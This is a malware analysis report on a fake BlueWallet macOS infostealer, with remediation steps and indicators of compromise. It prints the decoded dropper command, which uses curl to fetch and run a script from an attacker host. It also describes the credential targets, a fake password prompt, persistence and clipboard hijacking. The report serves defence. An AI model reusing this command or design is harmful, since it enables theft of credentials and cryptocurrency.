The macOS threat landscape has witnessed a significant paradigm shift. As Apple hardens its Unix-based operating system with increasingly restrictive application security barriers, threat actors are aggressively pivoting from low-level binary exploitation to sophisticated behavioral and social engineering exploitation. A clear manifestation of this trend is a highly targeted infostealer campaign masquerading as the legitimate cryptocurrency wallet application, BlueWallet. Rather than exploiting zero-day security vulnerabilities within the core operating system or breaking into the authentic codebase of the wallet, cybercriminals have weaponized branding and native system administration tools to trick users into deploying a wide-ranging, multichain infostealer.

Initial Access Vector: Circumventing Gatekeeper via AppleScript Execution

The execution chain begins on a malicious domain, update-bluewallet[.]com, engineered to closely mirror the official BlueWallet infrastructure (bluewallet[.]io). To catch visitors off guard, the attacker implements a time-based download routine directly into the page’s document object model (DOM). The script initializes an automated two-second loop upon page completion, instantly calling a download execution for a file named BlueWallet Installer.applescript. The same download function is redundantly mapped to the primary interactive buttons on the interface to guarantee the delivery of the initial stage vector regardless of user action.

What makes this campaign highly effective is the strategic choice of the .applescript extension. When an untrusted, unsigned application binary (.app or .pkg) is downloaded from an untrusted web source, modern macOS systems flag the file with a quarantine attribute, running it through rigorous Gatekeeper verification and developer notarization checks. However, a raw text-based AppleScript file does not register as a standard application binary. Instead, the compromised landing page presents a dynamic tutorial that instructs the victim to open the file using the native macOS Script Editor utility.

By guiding the user to execute the payload within an explicitly trusted, signed system developer tool using the graphical “Play” interface, the attacker effectively completely sidesteps application verification workflows. The user is manually instructing an authenticated Apple tool to execute arbitrary code, ensuring that no notarization gates are tripped.

Stage-One Dropper Analysis: De-obfuscating the Base64 Shell Trigger

The initial file, BlueWallet Installer.applescript, contains decorative comments carefully crafted to simulate an authentic configuration utility. The metadata within the script asserts a fake version hierarchy and includes deceptive strings referencing a legitimate package manager routine, reading "Brew Install Upgrade". Beneath this administrative facade lies an extremely concise, high-impact script designed to run an encoded system terminal shell sequence and immediately close the editor interface to wipe traces from the user’s active screen.

The payload executes a single-line, base64-encoded shell script wrapped inside a native do shell script command block. Upon evaluating the encoded baseline string, the command decodes into the following instruction sequence:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

Analyzing this triage line from an incident response standpoint reveals classic staged dropper behavior. The curl command operates with a silent flag (-s), executing an outbound connection to an attacker-controlled repository at projects2026box[.]com to fetch the true stage-two payload script. It saves this file into a hidden, volatile system directory as /tmp/.sysupd.sh—a naming convention explicitly chosen to masquerade as an internal system update process. The script instantly updates permissions via chmod +x to make the payload executable, and subsequently triggers background process execution while redirecting standard output and error streams (>/dev/null 2>&1 &) to completely mute local operational noise.

Stage-Two Payload Architecture: XOR De-obfuscation and C2 Infrastructure

The moment /tmp/.sysupd.sh assumes runtime execution, it establishes an explicitly restricted runtime workspace to isolate its operations from concurrent processes. It configures a strict mask using umask 077, ensuring any directory or file provisioned during the harvesting cycle is read-write accessible solely by the compromised user context. The malware then establishes a dynamically provisioned, hidden staging environment directly within the temporary file layer (/tmp), leveraging random entropy inputs pulled from the kernel random number generator /dev/urandom.

To obscure operational metadata from static string analytics, the shell script implements a basic string obfuscation wrapper known as the _xd routine. This function is designed to ingest a raw hexadecimal sequence, iterating across the string two characters at a time, and executing a logical bitwise XOR operation against each byte utilizing a hardcoded repeating cryptographic key: swckR9JCD2Uu.

While this algorithm is structurally weak and entirely reversible since both the processing function and the key reside exposed in the script layout, it is highly successful at slipping past simple heuristic scanners looking for raw plaintext strings. Decoding this routine unmasks the complete interactive backend profile of the implant, including:

• The primary Telegram Bot API Token
• The specific Chat Identifier tracking the operator’s drop zone
• An auxiliary secondary command token
• The target deployment staging URLs

Architecturally, the threat actor leverages the exact same Telegram channel configuration for both outbound data exfiltration streams and incoming remote-control instructions. This enables the malware to piggyback on authentic, encrypted TLS traffic tunnels that comfortably flow past traditional network ingress/egress filter configurations. However, not all components undergo this obfuscation routine; the public cryptocurrency addresses utilized during the dynamic clipboard interception loop remain explicitly declared as plain text lines within the script structure.

The Data Harvesting Matrix: Target Repositories

The underlying architecture of the stage-two script features an expansive collection engine designed to systematically parse, package, and harvest highly sensitive data across six core system repositories:

1. Web Browsers

The collection loop loops across local application state directories to extract active session cookies, saved logins, history databases, and local bookmarks from an extensive list of browser forks:

• Chromium Ecosystem: Google Chrome (Stable, Beta, Canary, and Dev releases), Brave, Microsoft Edge, Vivaldi, Opera, Opera GX, Arc, Chromium, Coccoc, and Yandex.
• Gecko/Firefox Ecosystem: Firefox, Waterfox, Pale Moon, Zen, and LibreWolf.
• Native Ecosystem: Native Apple Safari configuration directories, tracking cookie jars, structural state histories, and form autocomplete values.

2. Desktop Cryptocurrency Applications

Reflecting its focus on digital assets, the script conducts target sweeps across the default local storage directories for standard desktop wallet implementations, explicitly copying files related to:

• Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper.

3. Browser Extension Crypto Wallets

The malware runs localized profile parsing loops across the extension store paths of all discovered web browsers, zeroing in on the local secure storage vaults of the following extension configurations:

• Bitcoin Ecosystem: Xverse, Leather, UniSat, Alby, and Wizz.
• Solana Ecosystem: Phantom, Solflare, Backpack, Nightly, MagicEden, Sollet, and Slope.
• EVM Ecosystem: MetaMask, Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin, and XDEFI.
• Cosmos Ecosystem: Keplr, Station, and Cosmostation.
• Alternative/Multi-Chain Systems: Yoroi, Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos, and Temple.

4. Password Managers and Multi-Factor Authentication

The harvesting loop systematically accesses local storage and settings profiles belonging to primary identity management suites, including:

• LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup.
• Concurrently, the engine targets data directories linked to 2FA and time-based token generating configurations, searching for secrets tied to Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP.

5. Developer Configurations and Local Credential Vaults

To compromise high-privilege technical targets, the script executes an extensive scan across the root user home configuration directory (~), searching for high-value deployment credentials and authentication keys:

• Cloud provider credentials inside the AWS CLI (.aws) configurations.
• Local SSH keys and known host matrices inside .ssh.
• GnuPG cryptographic keystores located within .gnupg.
• Cluster orchestrator configurations within Kubernetes (.kube) directories.
• Deep environment profiles and history caches tracking local shell commands (.zshrc, .zsh_history, .bash_history, .gitconfig).

6. Productivity Environments and Local File Systems

The script copies the absolute local state relational database for Apple Notes, duplicating NoteStore.sqlite to parse through plaintext text repositories. It also scrapes storage elements linked to web productivity extensions (Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep).

Finally, it initiates a recursive filesystem walk across the user’s Desktop, Documents, and Downloads profiles, target-collecting any file falling below an internal size cap that matches high-yield file extensions: .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env.

Post-Exploitation Tactics: Credential Phishing, Persistence, and Dynamic Clipboard Interception

Once local data aggregation completes, the malware initiates an active local credential phishing routine. It spawns an administrative osascript graphical alert dialog box explicitly titled "System Preferences", prompting the user to re-input their account login password “to continue”. To ensure the threat actors do not log junk data, the script processes the input directly against the native Directory Service command-line tool using dscl . authonly. The dialogue box loops indefinitely, blocking user progress until a fully authenticated, valid password hash is parsed and successfully logged.

To package the mass of data for outbound delivery, the script avoids installing third-party utilities and instead relies on the built-in macOS ditto compression tool. Because ditto cleanly preserves resource forks and HFS+ metadata natively, it acts as a reliable exfiltration packing tool. Since the Telegram Bot API enforces a hard file upload ceiling of 50 MB, the script passes the generated archive through the system split utility, fragmenting the stolen data into precise 49 MB segments prior to execution of sequential transmission payloads.

Persistence is achieved by generating a custom property list configuration file (plist) which is written directly into the user’s local startup path (~/Library/LaunchAgents). Backed by a hidden application support path, this file is loaded directly into the active kernel tracking matrix using launchctl, guaranteeing that the malware restarts automatically during subsequent system login events.

[System Clipboard Active] ──> [clip_watch Regex Match] ──> [pbcopy Overwrite with Attacker Wallet]

Simultaneously, a persistent background monitoring function named clip_watch constantly polls the macOS system clipboard. It screens text data for strings matching Bitcoin, Ethereum, or Solana wallet address regex architectures. If a match occurs, the script forwards the legitimate target address up to the command channel and instantly intercepts the paste process by using the native system pbcopy utility to overwrite the user’s clipboard buffer with the attacker’s public wallet addresses.

Finally, the implant maintains an interactive polling function called c2_loop that continuously checks the Telegram bot interface for live, operator-issued commands. This framework provides remote attackers with a comprehensive interactive operational environment:

• /info – Generates granular hardware and system configuration reports.
• /exec – Executes arbitrary terminal command sequences natively.
• /clipboard – Exfiltrates the real-time textual contents of the clipboard.
• /download – Pulls specified target files out of the local system architecture.
• /exfil – Forces an on-demand re-execution of the data-harvesting core module.
• /selfdestruct – Purges all LaunchAgent keys, temporary workspaces, and hidden footprints to leave minimal tracking traces for forensic investigators.

Incident Response and Remediation Protocols

If an asset has executed the malicious AppleScript payload, the host must immediately be handled as an untrusted, high-severity compromise. The following defensive operations should be performed sequentially:

1. Network Isolation: Instantly disconnect the physical network link or terminate wireless connectivity to disrupt active remote control loops and stop ongoing data exfiltration chunks.
2. Persistence Removal: Audit the local LaunchAgents directory (~/Library/LaunchAgents) to locate and wipe any untrusted plist keys. Inspect and erase the volatile staging area to remove the hidden payload execution script at /tmp/.sysupd.sh.
3. Out-of-Band Credential Revocation: Utilizing a completely independent, verified secure machine, systematically cycle all authorization keys exposed during the compromise. Priorities must scale from primary enterprise email structures and multi-factor authenticators to high-value cloud endpoints, SSH nodes, and cryptocurrency exchange accounts.
4. Cryptocurrency Asset Migration: Because the infostealer actively parses local extension storage and scans local files for seed words, any cryptocurrency wallet configuration tracked on the host must be classified as completely exposed. Create fresh wallets on a clean, hardware-isolated device and immediately move assets away from the compromised seed paths.
5. System Re-imaging: Given the raw terminal command execution access (/exec) built into the malware’s C2 matrix, persistent kernel alterations or advanced modifications cannot be ruled out. The most reliable path to operational integrity involves backing up cold data documents, securely wiping the storage drive, and performing a completely clean reinstall of macOS from an authenticated recovery source.

Indicators of Compromise (IoCs)

File Artifacts (SHA-256)

• 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 – BlueWallet Installer.applescript

Network Hostnames

• update-bluewallet[.]com – Initial Phishing Vector and Malicious Dropper Landing Site
• projects2026box[.]com – Stage-Two Payload Delivery Host

Hardcoded Attacker Cryptocurrency Addresses

• Bitcoin (BTC): bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
• Ethereum (ETH): 0x2B871703122064e45d77146a6D5203da3bD192FA
• Solana (SOL): 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

Our Opinion

The emergence of this fake BlueWallet campaign underscores a critical shift in the macOS threat landscape: security controls have become so robust that attackers are abandoning complex zero-day exploitation in favor of sophisticated behavioral manipulation. By shifting the execution vector from unsigned, compilation-heavy binaries to a trusted native tool like Script Editor via a .applescript dropper, threat actors completely neutralize the protections provided by Apple’s application notarization and Gatekeeper frameworks. This strategy effectively weaponizes the user’s administrative intent against their own machine.

Furthermore, utilizing Telegram as a dual-channel command-and-control server showcases an ongoing trend of “living off the land” in network spaces, where malicious commands hide in plain sight amidst legitimate, encrypted HTTPS traffic. The depth of the malware’s exfiltration scope—targeting everything from cryptographic extension vaults to local shell histories and cloud configuration dots—reveals a calculated focus on high-yield developer environments and liquid crypto assets.

Moving forward, perimeter and endpoint protection mechanisms must evolve past static signature matches for compiled apps. Security solutions must enforce behavioral analysis on user-initiated scripts and treat unexpected scripting actions with the exact same layer of isolation and scrutiny given to foreign binary payloads.